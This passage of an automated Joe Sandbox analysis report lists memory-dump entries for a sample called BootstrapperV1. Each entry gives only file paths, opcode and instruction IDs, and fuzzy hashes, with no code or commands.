                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09705fb3b55984563c85b53174c0f245a5241ff3a795742577eff0ac1659a401
                                              • Instruction ID: 28ce7d84e032684d6aa3542a290829de621d769755d07728c0e8fea9ec8b2858
                                              • Opcode Fuzzy Hash: 09705fb3b55984563c85b53174c0f245a5241ff3a795742577eff0ac1659a401
                                              • Instruction Fuzzy Hash: 91914862B0E6C91FE71697B8547A6A97FF0DF5A214F0901FAC0C9CB2B3C9196806C341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d42e746f75b597798313509be0a7af00602dfb395aa3152952f834f346d87f51
                                              • Instruction ID: 7cef5c0a2aae4a54d0282145620470532da3bf10ed6839db3a93e9fa9ebb6a8d
                                              • Opcode Fuzzy Hash: d42e746f75b597798313509be0a7af00602dfb395aa3152952f834f346d87f51
                                              • Instruction Fuzzy Hash: 91814771A1DF8A4FE7A4E36844697B5B7E2FFA9340F44067DD089C31F2D928A9438741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 332c52b49da9584f57913ae0e14997ba673f57e4f0b39f4642c4adfbdd326937
                                              • Instruction ID: 2fe9e61ccc2822de3b7f40cfa686a77ddff1fe560e2a726683f97ec4574fb50c
                                              • Opcode Fuzzy Hash: 332c52b49da9584f57913ae0e14997ba673f57e4f0b39f4642c4adfbdd326937
                                              • Instruction Fuzzy Hash: 89A16130A19B0A8EE735DF68C0A47B5B7E1BF54314F15467EC0DE872B2DA39B9828741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b77d181d4bc396d5765d669c617e2a22b27639a202d1aa448bad2e859a81723
                                              • Instruction ID: 33ea8b06b103f803f6c95829845008dfefbf6de87ed0e126e44c14fc93a03412
                                              • Opcode Fuzzy Hash: 5b77d181d4bc396d5765d669c617e2a22b27639a202d1aa448bad2e859a81723
                                              • Instruction Fuzzy Hash: F6712D30B19A4E8FDF94EF5CC495BBA37E1FF68341B050279E40AD76B1DA24E9418790
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11360d7ad5a910d37de6994122f7f93ddc30ee68691f8b6c0106a9eed66ba753
                                              • Instruction ID: 17c987dc19b78d2b306412018cc77b54cd8ad35899efecec80f50b1be4ab3252
                                              • Opcode Fuzzy Hash: 11360d7ad5a910d37de6994122f7f93ddc30ee68691f8b6c0106a9eed66ba753
                                              • Instruction Fuzzy Hash: 3181D670A0EA8D4FEB55EBB844656A9BBF1EF5A300B4405FAD089D72B3CD296902C741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0327506e5206ea222980c7ec459360653e5c909bc6af368859050a8f1e22dce
                                              • Instruction ID: d899425e6ef748a2f0d31677f5e0c20d88f56dcea03c01c2c2be9082cffbec55
                                              • Opcode Fuzzy Hash: b0327506e5206ea222980c7ec459360653e5c909bc6af368859050a8f1e22dce
                                              • Instruction Fuzzy Hash: 46816170B09A4D8FDBA8EF58C465BA877E1FF59314F0602B9E44DD72A2CA34E941CB41
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c68e02c1e788c788c34053fa5dad72d9d31acdde489dd0af6163506e12671fe8
                                              • Instruction ID: a5eb81725d660abaa071c7ab3bbb6f16f28a7426a021de3bf6d84e260da4ad4c
                                              • Opcode Fuzzy Hash: c68e02c1e788c788c34053fa5dad72d9d31acdde489dd0af6163506e12671fe8
                                              • Instruction Fuzzy Hash: 5781A070B0A64D4FEB69EBA894617B97BF1EF46300F5401BED08ED76E2CE296941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97ff5a6ef9e7c66c25f15d29a421ad1e849ad33cbaf19e1a9c8d1c27608bc527
                                              • Instruction ID: 39c16b4b04278cdb00ad1ddcb3bace82ca28e895cbaf326f2104ed81ea256c8c
                                              • Opcode Fuzzy Hash: 97ff5a6ef9e7c66c25f15d29a421ad1e849ad33cbaf19e1a9c8d1c27608bc527
                                              • Instruction Fuzzy Hash: B231B532F0EA5C4FD765EB5C98696E97BE1EF99220F0502B7E44CC72A6DE145C058381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0f9d9c2a881431142511ccd3a004dfb5024227dbf7e6692c1ae8dd8330d3c74
                                              • Instruction ID: bd6747ed1bd30469297e8307f0efabec0b03ce8f9015e5e96e4531f67033533c
                                              • Opcode Fuzzy Hash: a0f9d9c2a881431142511ccd3a004dfb5024227dbf7e6692c1ae8dd8330d3c74
                                              • Instruction Fuzzy Hash: 8E31F631B0EA4D0FE7A8DF6C98686B977D0FF58210F4106BBD48DC72B2DE2569018740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5520f7385a3baa5bbd6889303f7643629ebdca6c15415023c698b425e3db1c8a
                                              • Instruction ID: 2bad7d2ba0b1e2b2ab23f47312f4d4a8abefa85b502f0379002f4cb236c0fef7
                                              • Opcode Fuzzy Hash: 5520f7385a3baa5bbd6889303f7643629ebdca6c15415023c698b425e3db1c8a
                                              • Instruction Fuzzy Hash: 9A317C32F19E1C4FEBA4EA5C94697A973E1FB98320F0502BBE44DD72A5DE14AC024380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc7e6d1eb5fa216c1eb544ae77fec4fd37ec1a4813afa0d47fbbed8da4e16350
                                              • Instruction ID: 804ccfe43c7a2c4894dcf1e993e930bc2e49482377b32fd6552b7a1d0c3717c8
                                              • Opcode Fuzzy Hash: cc7e6d1eb5fa216c1eb544ae77fec4fd37ec1a4813afa0d47fbbed8da4e16350
                                              • Instruction Fuzzy Hash: 5531C772B0DA4D4FEB959B6C58355A937E1EF95710F0501BBE09DC32B2EE15A9028381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c48b5a680e786ed161ae8ad4ffd2b21263bd46e88d567fbf314a0dd05fd6ee3
                                              • Instruction ID: 32cc4d9ae3d8b44bc64f38ccb0987e816c6abe35b956b036afede707eebb33ad
                                              • Opcode Fuzzy Hash: 3c48b5a680e786ed161ae8ad4ffd2b21263bd46e88d567fbf314a0dd05fd6ee3
                                              • Instruction Fuzzy Hash: 3631392160EBC94FD766DB688875A743FE0EF52250B0A42FBD489CB1F3DA085C458352
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9767a0b47564ecfa1a060bce6fd789da8d9d9baf4d2d3feab047ae356c339c06
                                              • Instruction ID: 3d9abf80241430fa405051d4b4e966c7bb3c4046ce528ae0d5978901350bff76
                                              • Opcode Fuzzy Hash: 9767a0b47564ecfa1a060bce6fd789da8d9d9baf4d2d3feab047ae356c339c06
                                              • Instruction Fuzzy Hash: 1E319530B0EB1E4BE7B9A7A450356B972D2EF48714F51067ED48D832F6DE3AFA458240
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8ab6b3c20e35505baae7e8c19f95890585718fa45ba332d779be6d1713d8a2d
                                              • Instruction ID: 8c08677fa81340c2372b0a1beec593ed4683d4ffdc390c8602db73f86d3e6ec9
                                              • Opcode Fuzzy Hash: b8ab6b3c20e35505baae7e8c19f95890585718fa45ba332d779be6d1713d8a2d
                                              • Instruction Fuzzy Hash: D531D761B1EB4D0BEBA59E6C54B57643BD2EF9A304F4612B8E06DC32F2DD15A8028300
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0faf3f8acc34ecca046b92cba11445b68045c4509be9d08166dc1dcc8f489261
                                              • Instruction ID: f780d49a99298d71425a5de63b7ddd34fece9ee2a91ed191f165eb33e966eb61
                                              • Opcode Fuzzy Hash: 0faf3f8acc34ecca046b92cba11445b68045c4509be9d08166dc1dcc8f489261
                                              • Instruction Fuzzy Hash: 48318E32A0FF8A0FE7B5966844A8AE57BE1EF5475070903BBD089C30F3ED1878468760
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4fb6eaf6647559e91b183d30329e84b6f96a420e792d5d21c437f8734fb6ba20
                                              • Instruction ID: 21de5f0f37da9bab29b94b5b1663d0926f705407f1a0552d41ac4f17bd881e8d
                                              • Opcode Fuzzy Hash: 4fb6eaf6647559e91b183d30329e84b6f96a420e792d5d21c437f8734fb6ba20
                                              • Instruction Fuzzy Hash: 6631B47199E3951FD31647646C275F27BA4DF42329B1A02F7D498CB9F3C90E2A838362
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 309f70cab71696b88487c4530052b449c8f6be14b3d7f14d404739384f8f2575
                                              • Instruction ID: 7d03b3732012a285748cc228836e844265902b842fb718d2b26d86c4c096d8a3
                                              • Opcode Fuzzy Hash: 309f70cab71696b88487c4530052b449c8f6be14b3d7f14d404739384f8f2575
                                              • Instruction Fuzzy Hash: 54315821F0AA4D0FD7A4DBAC98247B93BE1EF95210B4541FAE89DC72B6DD1859028391
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db8f205766eb48c3dcb388d0d9f6947eeaaf256accbd44a11a07a8af8c5b4af5
                                              • Instruction ID: 1624912c779603944c71d98f70648b16fdeefa320988281f621382f64d3edd0d
                                              • Opcode Fuzzy Hash: db8f205766eb48c3dcb388d0d9f6947eeaaf256accbd44a11a07a8af8c5b4af5
                                              • Instruction Fuzzy Hash: 2621BF22B1EE0E0FFAA8E65C6474B7933C6EBD8291B51427AE44EC32A5ED15EC024350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96c5dbb0216296d0d49c5e19c505d81147a9dbc01c3e059af5a87f6b9e3aa4dd
                                              • Instruction ID: 66684f06b3c4cb6ccfca35d8b51586b1e73dd2cf40048d97205b836202560081
                                              • Opcode Fuzzy Hash: 96c5dbb0216296d0d49c5e19c505d81147a9dbc01c3e059af5a87f6b9e3aa4dd
                                              • Instruction Fuzzy Hash: 3E31F612B0D6560AE32973EDB0299FD3790DF81326F9F02BBD19D890E79C192645C2A5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dccba0130437889abac72e2ff1e4e8a26a79a4e8ef2925dcc53a573e859e1a7b
                                              • Instruction ID: 6627e6a1104d54ddf1cf42e5d34792b3e5541cb957e131702364f6c806d2bb27
                                              • Opcode Fuzzy Hash: dccba0130437889abac72e2ff1e4e8a26a79a4e8ef2925dcc53a573e859e1a7b
                                              • Instruction Fuzzy Hash: 4D31B330B09B1A4BE368EB7894697B2B7D0FF45319F15067AD4CEC62A6DE24F541C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49b1c798872e95c4efe93c54f0b5336864231a42724317b9796aee71d7c80ffa
                                              • Instruction ID: 67f7ee5e03b3db7a362f90a6ea2d00c9def15c6b60d33bbc965b84c6c633a612
                                              • Opcode Fuzzy Hash: 49b1c798872e95c4efe93c54f0b5336864231a42724317b9796aee71d7c80ffa
                                              • Instruction Fuzzy Hash: D0314C31A09B8D4FDB65DB6888255A97BF1EF9A340F0502EBD05CD72F3DB295D028741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e0dc57cf136fe60c40eb99235be745328aaa8e373ff233b99c0048ab45adc79
                                              • Instruction ID: 13f2e7bfe2e12f521089b7e134d71dad98733e4a808c9e64b172ac7ab5c6e4aa
                                              • Opcode Fuzzy Hash: 4e0dc57cf136fe60c40eb99235be745328aaa8e373ff233b99c0048ab45adc79
                                              • Instruction Fuzzy Hash: D431217061A78D5FE7698F5888657A63FE1EF5A300F1441BAE089C72A2CA289C83C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b1f88fb0927d19d216c9e9cf5e1a3766ee535508af0e737261d967a4fb90281
                                              • Instruction ID: 36ebf319ff1002a56355a59925ade0e94eaa50ab11e677f33ad41a7e861c4f0f
                                              • Opcode Fuzzy Hash: 9b1f88fb0927d19d216c9e9cf5e1a3766ee535508af0e737261d967a4fb90281
                                              • Instruction Fuzzy Hash: 26214F30B1DB0D4FEBA8DB5C94656BD77E1EF98B10F45027EE04ED32A1CE24A9418785
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e1f4ea3316536a62f055fd12d3f89b029c21acb0a002f733cf103870d223868
                                              • Instruction ID: 0e3a54eb1860c1abc2ebe9c6364cf424e59c40f4fe51f692d1d6d47a1d51a1e3
                                              • Opcode Fuzzy Hash: 6e1f4ea3316536a62f055fd12d3f89b029c21acb0a002f733cf103870d223868
                                              • Instruction Fuzzy Hash: 29319231B19B0E8BE7A89A6884643B173D0FF45315F05067AD4CEC62A5DE28F9428740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7868b90f947f412b693f0ea3e6ec4b2e6e6d6195256b7153a1644a37e661a0a1
                                              • Instruction ID: ce32a0443756a76dffcf3fdccace13b1c16192c3b110a4a79bafd095055cc776
                                              • Opcode Fuzzy Hash: 7868b90f947f412b693f0ea3e6ec4b2e6e6d6195256b7153a1644a37e661a0a1
                                              • Instruction Fuzzy Hash: F421B431A1DA0D0FEB94DBAC94696F9BBD0EF98361F050277E84CC31B1DE25A9408741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2b5b179be20678912eebde0a494bdd2c7ea705ef16eedaccc031273793091ce
                                              • Instruction ID: 4b5fffffc9a68736e676faf2aa47b6de42c236179acdfbda2b59e4b7f3dbb133
                                              • Opcode Fuzzy Hash: f2b5b179be20678912eebde0a494bdd2c7ea705ef16eedaccc031273793091ce
                                              • Instruction Fuzzy Hash: 5F119313B1EA1E0BF5B8508D3CA6278B3C6D7DD975B460377E48ED32B5DC096D820281
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb579bfe199a4b67fc3ad1d9439a65612a0fad115d19f2ac73b650745305768a
                                              • Instruction ID: 57572c5f011cdafeb7498c01fb8308c92680a314cc9dee336ec00e61398cb8c6
                                              • Opcode Fuzzy Hash: fb579bfe199a4b67fc3ad1d9439a65612a0fad115d19f2ac73b650745305768a
                                              • Instruction Fuzzy Hash: 0031B371B1DB0D4BEB68AF649061AB573E1EF44310F91057EE48E822E6DE39E9028740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 438ff19bfe38b49481acec5d0fca8c0d799e0312184ad7035b62e8de3e94b6b2
                                              • Instruction ID: 4d7b67831789ea206093087b3c342f302e4cbfea7bbbc1a16fb0be24c7e94a4b
                                              • Opcode Fuzzy Hash: 438ff19bfe38b49481acec5d0fca8c0d799e0312184ad7035b62e8de3e94b6b2
                                              • Instruction Fuzzy Hash: D8217C22B1DF8A4FD799DB2884B16B477F1FFD524070946BBD049C71E6DE18A8028341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c0b20b4209666d7e36cd7278793d9a178d2b62fb20b43612a2d6b7f05cedfa6
                                              • Instruction ID: 5c71d4760bb38ba52cf9cc169150501bd5d7552990ad9bbde60d4076fc658096
                                              • Opcode Fuzzy Hash: 1c0b20b4209666d7e36cd7278793d9a178d2b62fb20b43612a2d6b7f05cedfa6
                                              • Instruction Fuzzy Hash: 3E21F3A0A1F6C91FD79AA7B82876AF57FE08F07210B0805EAD099CB1F3C81D58468351
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4671b1d612c0d0407691007230f025970d5da2a46b0bf6e9014dadc4f25772f3
                                              • Instruction ID: a0faeaa698390e48d83c55fdc61bcce9d79033511ef96cf72f82dec7dd4ac153
                                              • Opcode Fuzzy Hash: 4671b1d612c0d0407691007230f025970d5da2a46b0bf6e9014dadc4f25772f3
                                              • Instruction Fuzzy Hash: E831A461B0DA8D0FEBA1EB6C54797A43BE1EF59204B0A01F9D099CB1F7ED18D9028310
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a683a69aeeadaa72b50161e5c62a680845bd65087a08e8ab52ca92cf055aad9
                                              • Instruction ID: 4e55014396ba5dcb8f30d72a00c7519da09e44f30586b3eabff79a91995cc591
                                              • Opcode Fuzzy Hash: 8a683a69aeeadaa72b50161e5c62a680845bd65087a08e8ab52ca92cf055aad9
                                              • Instruction Fuzzy Hash: FD212C22B0EA5D0FDBA5DAAC94692F97BF0EF95320F0502BBE44DC71B2DE545D058381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e80c56509de73b46d0ed2ccfaea0e3f225ff8ffbc5f599cb0682872ece286037
                                              • Instruction ID: ba49dce24bc4d586154308218ccb25c3f157278a21b0b7ebe5032a6a79c5e6d1
                                              • Opcode Fuzzy Hash: e80c56509de73b46d0ed2ccfaea0e3f225ff8ffbc5f599cb0682872ece286037
                                              • Instruction Fuzzy Hash: 1121F032B0DB0C4FF768AA5C74621F977D1EF99621B1102BBE14EC32B2DD16A8034686
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49cd7058b612ba8f94fa3ced1d6e82590a0d280c807071bdb7563408af55b996
                                              • Instruction ID: 57574121b4dd3ed1130c631b5e1958c6f9e894225273bc9ca183f445f096d5c4
                                              • Opcode Fuzzy Hash: 49cd7058b612ba8f94fa3ced1d6e82590a0d280c807071bdb7563408af55b996
                                              • Instruction Fuzzy Hash: 59215722B1EE4E0FE7A9966C6835BB573C1EFD8251B06027AD84CC72B2DC19ED424360
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6312171dfde09dd3c1e102cd9ebf3b06261cb9b9619eca83b7fb2c49806a33b
                                              • Instruction ID: a072eb780ceb4f6186143c7bb75f6f2b9103896f087df10c48f5f71e1c1275d9
                                              • Opcode Fuzzy Hash: e6312171dfde09dd3c1e102cd9ebf3b06261cb9b9619eca83b7fb2c49806a33b
                                              • Instruction Fuzzy Hash: 6C213531A0978D4FDB65DB6888256F57BF1EF9A300B0502EBD099C72F3DA2D69028751
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95acd7017efee35e39a0cd7365430f5ca8eee4919deac6162e8c6fc11d324794
                                              • Instruction ID: 7fc2b23c5f99d37dd87ff7306c481d2ca81e9cc2b8ee5dc263007c716b88e487
                                              • Opcode Fuzzy Hash: 95acd7017efee35e39a0cd7365430f5ca8eee4919deac6162e8c6fc11d324794
                                              • Instruction Fuzzy Hash: 6A110822F1EA8E0FE7A4A6AC58659A5B3D1EF9931074742B7D08DC31B6DC18BE418390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
